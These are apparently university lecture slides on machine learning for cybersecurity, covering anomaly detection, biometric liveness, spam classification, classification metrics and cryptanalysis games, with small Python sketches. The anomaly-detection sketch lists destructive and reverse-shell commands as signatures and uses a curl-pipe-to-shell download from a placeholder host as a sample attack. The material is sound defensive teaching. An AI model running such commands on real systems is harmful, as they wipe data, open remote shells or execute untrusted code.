FIT2093 INTRODUCTION TO CYBERSECURITY

Week 11 Lecture
Machine Learning / AI for Cybersecurity
www.monash.edu.au

Machine Learning for Cybersecurity
● Machine learning: What is it?
○ types of learning
○ types of machine learning problems
○ generative vs discriminative models
○ e.g. pattern recognition, feature extraction

Machine Learning for Cybersecurity
● Machine learning for cybersecurity problems
○ binary classification
○ anomaly detection
○ lie detection
○ biometrics
○ spam classification
○ tasks in classification
○ classification metrics
○ cryptography

Question
● Q: Give an example scenario where you think Machine Learning/AI might be used to defend a system against attacks.

Question
● Q: Give an example scenario where you think Machine Learning/AI might be used to attack a system.
Activity (5 mins)
1) Click the latest link in the Zoom chat
2) Add your question response to the Ed forum
3) Add your “hearts” to your favourite responses

Machine Learning: What is it?

Machine Learning: What is it?
● Machine learning
○ learn from experience, improve over time
• learn to do what?
• how to improve?
• with time, what experience is enhanced?
● Includes but is not just optimization
○ max or min some objective function s.t. some constraints

# Machine Learning: What is it? #
● Machine learning: learn from experience, improve over time
○ learn to do
• classification: choose 1 of N labels/categories/classes
• regression: predict numerical values

# Machine Learning: What is it? #
● Machine learning: learn from experience, improve over time
○ learn to do
• clustering: group similar samples
• density estimation: construct the probability distribution of observed samples

# Machine Learning: What is it? #
● Machine learning: learn from experience, improve over time
○ learn to do
• association rule learning: discover relations between samples
• dimensionality reduction / feature learning / representation learning: reduce the dimensions of features in the dataset of samples

# Machine Learning: What is it? #
● Machine learning: learn from experience, improve over time
○ learn to do
• reinforcement learning: game-like training to maximise reward and minimise penalty

Machine Learning: What is it?
● Machine learning: learn from experience, improve over time
○ how to improve?
• ↑ accuracy of prediction/estimation
• ↓ difference from desired
○ with time, what experience is enhanced?
• see more (labelled) samples e.g. (un)supervised learning
• more interactions (reinforcement learning)

# Machine Learning: What is it? #
● supervised learning: we'll focus on this, most common
○ ground truth samples available with class labels
● unsupervised learning
○ samples without labels, no ground truth
● semi-supervised: samples with & without labels
● reinforcement learning
○ no samples, learn from interactions & corresponding reward/payoff

# Machine Learning: What is it? #
● Discriminative model
○ learn the decision boundary between classes among samples
○ predict the class label
● Generative model
○ model the underlying distribution of the samples
○ can generate new samples from the same distribution

Pattern Recognition ⊂ Machine Learning
● pattern recognition = feature learning then classification
○ can treat each stage as a black box, various options
● e.g. for fingerprint biometrics
○ feature = minutiae

# Fingerprint Minutiae #

Pattern Recognition
● biometrics = pattern recognition applied to a security problem
● Q: Why do we need feature extraction? Why not classify directly?

Feature Extraction
● Q: Why do we need feature extraction? Why not classify directly?
● A: Feature extraction gives various projected views of the data; features from different viewpoints suit different classification problems
e.g. a top-down view of a person does not help to predict their height; a side view is better

Machine Learning for CyberSecurity Problems

Security Problems as Classification Problems
● binary classification
○ 2 classes/categories
○ involves feature extraction/learning before classification
● not everything in the data is useful; some of it is redundant or noise-like
● we only need to focus on some key aspects

Anomaly Detection as Binary Classification
● binary classification: 2 classes
○ normal/abnormal
○ benign/malicious traffic/behaviour e.g. intrusion/malware detection
○ (I) detect presence of known malicious signatures
○ (II) detect absence of known normal behaviour
● Q: when is approach (II) better than (I)?
● Q: when will both approaches not work?
● Q: how could an attacker cause both approaches to fail?
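
The two detection approaches above can be contrasted in a minimal Python sketch. The signature strings, the set of normal commands and the function names are all hypothetical, chosen only for illustration; real detectors use far richer features than exact string matching.

```python
# Hypothetical data: neither set comes from a real product.
KNOWN_MALICIOUS_SIGNATURES = {"rm -rf /", "nc -e /bin/sh"}
KNOWN_NORMAL_COMMANDS = {"ls", "cd", "git status", "make"}


def is_malicious_by_signature(event: str) -> bool:
    """Approach (I): flag an event only if it contains a known bad signature."""
    return any(sig in event for sig in KNOWN_MALICIOUS_SIGNATURES)


def is_abnormal_by_allowlist(event: str) -> bool:
    """Approach (II): flag an event if it is not known normal behaviour."""
    return event not in KNOWN_NORMAL_COMMANDS


# A made-up event that matches no known signature.
novel_attack = "curl http://example.invalid/payload | sh"
print(is_malicious_by_signature(novel_attack))  # approach (I) verdict
print(is_abnormal_by_allowlist(novel_attack))   # approach (II) verdict
```

In this sketch the unseen event slips past approach (I) but is flagged by approach (II); the price is that approach (II) would also flag any benign command missing from the normal set.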

Lie Detection as Binary Classification
● lie detection:
○ innocent vs suspicious
• e.g. presence of micro-expressions
• subtle facial movements, fraction of a second
• involuntary, sub-conscious reaction to emotion

Biometrics as Multiclass Classification
● Biometrics identification:
○ each ID is a class label
○ multi-class classification

Biometrics as Multiclass Classification
○ biometrics forgery problem
• biometrics considered by most to be highly unforgeable
• thus much reliance & false sense of security due to this assumption
• thus consequences devastating if forged
○ anti-forgery solution: liveness detection
• real vs forgery/fake
• assumption: real has liveness, fake does not
• e.g. sweat, pulsation, capacitance, …

Biometrics as Multiclass Classification
● counter anti-forgery attacks e.g. [Bowden-Peters et al. 2012]
○ Q: why does liveness detection not work?
• liveness is detected separately from feature extraction
[Diagram: a separate "Liveness Detect" stage outputs Live / Not Live]

Spam Detection as Binary Classification
● Spam detection:
○ Spam vs Non-Spam
○ datasets comprise entries of the form (label, text)
• where label ∈ {non-spam, spam}
○ could use Natural Language Processing (NLP)
• breaks language into shorter pieces

Classification: Empirical Tasks
● separate dataset into training set & test set
● train/build the classifier
○ let it learn from seeing labelled samples from the training set, learn the decision boundary
● test the classifier
○ …
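
The first step above, separating the dataset, can be sketched as follows. This is only an illustrative sketch: the 80/20 ratio, the fixed seed, the function name `train_test_split` and the toy dataset are assumptions, not something the lecture prescribes.

```python
import random


def train_test_split(samples, test_fraction=0.2, seed=0):
    """Shuffle a copy of the samples, then hold out a fraction for testing."""
    shuffled = list(samples)
    random.Random(seed).shuffle(shuffled)
    n_test = int(len(shuffled) * test_fraction)
    # The first n_test shuffled samples become the test set, the rest the training set.
    return shuffled[n_test:], shuffled[:n_test]


# Hypothetical labelled dataset of (label, text) pairs.
dataset = [
    ("spam", f"offer {i}") if i % 2 else ("non-spam", f"memo {i}")
    for i in range(10)
]
train_set, test_set = train_test_split(dataset)
print(len(train_set), len(test_set))
```

Shuffling before the split avoids a test set made up only of whatever samples happened to sit at one end of the dataset.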

Classification: Metrics
● test the classifier
○ give it the samples from the test set, without the labels; it should predict what the label is for each sample
○ compute the metrics:
○ accuracy = #correct / #totalSamples = (TP+TN) / (P+N)
○ precision = TP / all P predictions = TP / (TP+FP)
○ recall = TP / all samples in that class = TP / (TP+FN) (a.k.a. TP rate or sensitivity)
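
The three formulas above translate directly into code. The sketch below assumes the four confusion-matrix counts are already known and that no denominator is zero; the function name and the example counts are hypothetical.

```python
def classification_metrics(tp: int, fp: int, tn: int, fn: int) -> dict:
    """Compute accuracy, precision and recall from confusion-matrix counts.

    Assumes every denominator is non-zero (at least one positive prediction
    and at least one positive sample).
    """
    total = tp + fp + tn + fn  # equals P + N
    return {
        "accuracy": (tp + tn) / total,
        "precision": tp / (tp + fp),
        "recall": tp / (tp + fn),
    }


# Hypothetical test-set counts for 100 samples.
metrics = classification_metrics(tp=40, fp=10, tn=45, fn=5)
for name, value in metrics.items():
    print(f"{name}: {value:.3f}")
```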

Classification: Metrics
● test the classifier: compute the metrics
○ accuracy
○ precision
○ F1 score = harmonic mean H of precision & recall
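
As a small sketch, the harmonic mean of precision and recall is 2·precision·recall / (precision + recall). The function name and the example values are hypothetical; returning 0 when both inputs are 0 is a common convention assumed here, not something stated in the lecture.

```python
def f1_score(precision: float, recall: float) -> float:
    """Harmonic mean of precision and recall (0.0 if both are 0)."""
    if precision + recall == 0:
        return 0.0
    return 2 * precision * recall / (precision + recall)


balanced = f1_score(0.8, 0.8)    # precision and recall agree
lopsided = f1_score(0.9, 0.1)    # high precision, very low recall
print(balanced, lopsided)
```

Unlike the arithmetic mean, which would give 0.5 for the lopsided case, the harmonic mean stays close to the smaller of the two values, so a classifier cannot score well on F1 by excelling at only one of them.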

Classification: Metrics
● Recall last lecture's alternative classification metrics (commonly used in biometrics)
○ False Accept Rate (FAR) = FP / all N samples = FP / (TN+FP)
○ compare with (1 - precision) = FP / (TP+FP)
○ False Reject Rate (FRR) = FN / all P samples = FN / (FN+TP)
○ compare with (1 - recall) = FN / (FN+TP)
Note: the above definitions assume P = "positive" = "valid", N = "negative" = "invalid" (see next slide)
QUESTION: Which metric do you think is more relevant for security classification (assume P = "valid", N = "invalid"): FAR or (1 - precision)? Why?
Confusion matrix quadrants (with P = "valid", N = "invalid"):
Valid and accepted = TP
Invalid and accepted = FP
Valid and rejected = FN
Invalid and rejected = TN

A note on definitions
○ Definition of "positive" (P) / "negative" (N) can depend on the scenario/context
○ can be defined explicitly in each scenario to avoid confusion.
○ However, regardless of the definition of "Positive" or "Negative":
○ In security scenarios, the following natural convention for the meaning of Accept and Reject is usually followed:
○ Accept = gets through system = (if no errors) honest/valid/good
○ Reject = gets blocked = (if no errors) malicious/invalid/bad
○ Therefore FAR and FRR error rates can be defined generally as:
○ False Accept Rate, FAR = (# of malicious samples falsely classified as accept)/(total # of malicious samples)
○ False Reject Rate, FRR = (# of honest samples falsely classified as reject)/(total # of honest samples)
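
These general definitions can be computed without ever naming a "positive" class. The sketch below assumes each decision is recorded as a pair (is_honest, accepted); the function name and the example decisions are hypothetical.

```python
def far_frr(decisions):
    """Return (FAR, FRR) from an iterable of (is_honest, accepted) pairs.

    Assumes at least one malicious and at least one honest sample.
    """
    decisions = list(decisions)
    malicious_total = sum(1 for is_honest, _ in decisions if not is_honest)
    honest_total = sum(1 for is_honest, _ in decisions if is_honest)
    false_accepts = sum(
        1 for is_honest, accepted in decisions if not is_honest and accepted
    )
    false_rejects = sum(
        1 for is_honest, accepted in decisions if is_honest and not accepted
    )
    return false_accepts / malicious_total, false_rejects / honest_total


# Hypothetical outcomes: 10 honest users (2 wrongly rejected),
# 10 malicious attempts (1 wrongly accepted).
decisions = (
    [(True, True)] * 8 + [(True, False)] * 2
    + [(False, False)] * 9 + [(False, True)] * 1
)
far, frr = far_frr(decisions)
print(f"FAR = {far:.2f}, FRR = {frr:.2f}")
```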

Spam Detection as Binary Classification
● feature learning
○ bag of words (BoW)
• word & frequency
(1) John likes to watch movies. Mary likes movies too.
BoW = {"John":1, "likes":2, "to":1, "watch":1, "movies":2, "Mary":1, "too":1};
(source: Wikipedia)
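
A minimal sketch of building this bag of words in Python, using `collections.Counter` from the standard library. The tokenisation rule (runs of letters and apostrophes, case preserved) is an assumption made to match the example above; real pipelines usually also lowercase and remove stop words.

```python
import re
from collections import Counter


def bag_of_words(text: str) -> Counter:
    """Count how often each word occurs; punctuation is dropped."""
    return Counter(re.findall(r"[A-Za-z']+", text))


bow = bag_of_words("John likes to watch movies. Mary likes movies too.")
print(dict(bow))
```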

Spam Detection as Binary Classification
● classification
○ logistic regression classifier
• a weighted sum of the features (in this case, BoW incl. frequency counts) is input to a sigmoid function, which outputs a value between 0 and 1, i.e. a probability p
• p > 0.5 → class = 1, else class = 0
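
The classification step can be sketched as below. The weights and bias are hypothetical, hand-picked numbers; in practice they would be learned from the training set, which this sketch does not show.

```python
import math

# Hypothetical parameters; a real classifier learns these from training data.
WEIGHTS = {"free": 1.5, "winner": 2.0, "meeting": -1.8}
BIAS = -1.0


def sigmoid(z: float) -> float:
    """Squash any real number into the interval (0, 1)."""
    return 1.0 / (1.0 + math.exp(-z))


def spam_probability(bow: dict) -> float:
    """Weighted sum of word counts, passed through the sigmoid."""
    z = BIAS + sum(WEIGHTS.get(word, 0.0) * count for word, count in bow.items())
    return sigmoid(z)


def classify(bow: dict) -> int:
    """Class 1 (spam) if p > 0.5, else class 0 (non-spam)."""
    return 1 if spam_probability(bow) > 0.5 else 0


print(classify({"free": 2, "winner": 1}))   # weighted sum is 4.0
print(classify({"meeting": 1, "free": 1}))  # weighted sum is -1.3
```

Words missing from the weight table contribute nothing to the sum, which is one simple way of handling unseen vocabulary.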

Cryptanalysis as Binary Classification
○ CONFidentiality problem aims to safeguard secrecy of message m
● How? ensure only specific parties can access
○ lock it up: unlock only if have key
○ transform it: reverse transform needs a key
• encryption

Encryption for CONF?
● Encrypt? c = E(m,k)
○ m = message a.k.a. plaintext p
○ k = secret key
○ c = output ciphertext
● Q: since m needs to be CONF, how to ensure m remains CONF although c can be seen by anyone?

Breaking Encryption CONF
● the end goal = CONF of m, the means = CONF of k
● guessing k leads to breaking CONF of m
● cryptanalysis = security analysis of crypto techniques e.g. encryption
● basic cryptanalysis of encryption = binary classification problem
○ we’ll discuss a few variations of cryptanalysis problems, any of these would
indicate some weakness in the encryption design

Cryptanalysis of Encryption: Case I
○ chooses secret k
● Attacker
○ sees c
○ wants to guess k
● Case I: key-recovery attack

Cryptanalysis of Encryption: Case II
○ flips a coin {0,1}
• if 0: use k0
• if 1: use k1
● Attacker
○ sees c
○ wants to guess if k0 or k1
● Case II: key-distinguishing attack
● Q: which is easier for attacker to do? Case I or II?

Cryptanalysis of Encryption: Case II
○ flips a coin {0,1}
• if 0: use k0
• if 1: use k1
● Attacker
○ sees c
○ wants to guess if k0 or k1
● Q: which is easier for attacker to do? Case I or II?
● A: Case II is easier: just guess 1 of 2 options, vs Case I, i.e. guess all bits of k
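
To put numbers on this comparison, the sketch below computes the success probability of a single blind guess in each case. It assumes the key is chosen uniformly at random and that the attacker learns nothing useful from c; the 128-bit key length and the function name are illustrative assumptions.

```python
from fractions import Fraction


def key_recovery_guess_probability(key_bits: int) -> Fraction:
    """Case I: one blind guess must match every bit of a uniformly random key."""
    return Fraction(1, 2 ** key_bits)


# Case II: one blind guess between two candidate keys.
KEY_DISTINGUISHING_GUESS_PROBABILITY = Fraction(1, 2)

print(KEY_DISTINGUISHING_GUESS_PROBABILITY)
print(key_recovery_guess_probability(128))
```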

Cryptanalysis of Encryption: Case III
○ flips a coin {0,1}
• if 0: use m0
• if 1: use m1
● Attacker
○ sees c
○ wants to guess if m0 or m1
● Case III: plaintext-distinguishing attack
● Case II and Case III would be similarly difficult for the attacker since it is guessing 1 of 2 options

Cryptanalysis of Encryption: Case III
○ flips a coin {0,1}
• if 0: use m0
• if 1: use m1
● Attacker
○ sees c
○ wants to guess if m0 or m1
● Case III: plaintext-distinguishing attack
● Q: what weakness or problem could cause an attacker to be able to guess whether it is m0 or m1?
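
One possible illustration of the Case III game, using a deliberately weak toy cipher. Everything here is an assumption made for the sketch: the toy cipher (XOR of every byte with the same one-byte key), the messages and the function names are hypothetical and are not the lecture's own example. The sketch also assumes the attacker knows both candidate messages.

```python
import secrets


def toy_encrypt(message: bytes, key_byte: int) -> bytes:
    """Deliberately weak toy cipher: XOR every byte with the same key byte."""
    return bytes(b ^ key_byte for b in message)


def attacker_guess(ciphertext: bytes, m0: bytes, m1: bytes) -> int:
    """XORing two ciphertext bytes cancels the key and exposes the plaintext XOR.

    Works only when m0 and m1 differ in the XOR of their first two bytes.
    """
    leaked = ciphertext[0] ^ ciphertext[1]
    return 0 if leaked == m0[0] ^ m0[1] else 1


def play_game(m0: bytes, m1: bytes) -> bool:
    """Flip a coin, encrypt m0 or m1 under a fresh key, check the attacker's guess."""
    coin = secrets.randbelow(2)
    key_byte = secrets.randbelow(256)
    ciphertext = toy_encrypt((m0, m1)[coin], key_byte)
    return attacker_guess(ciphertext, m0, m1) == coin


wins = sum(play_game(b"attack", b"retire") for _ in range(200))
print(f"attacker won {wins} of 200 games")
```

In this toy setting the ciphertext leaks a relationship between plaintext bytes, so the attacker never needs the key to tell the two messages apart.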

Further Reading
• A. Polyakov, "Machine Learning for Cybersecurity", article available at: https://towardsdatascience.com/machine-learning-for-cybersecurity-101-7822b802790b
• This article discusses most of the topics we discussed, and provides links to further references.
Note: Our focus in this week’s lecture is on a high-level overview on the types of ML techniques and their potential applications in cyber security. We do not expect students to learn the details of how ML algorithms work – this is outside the scope of this unit.
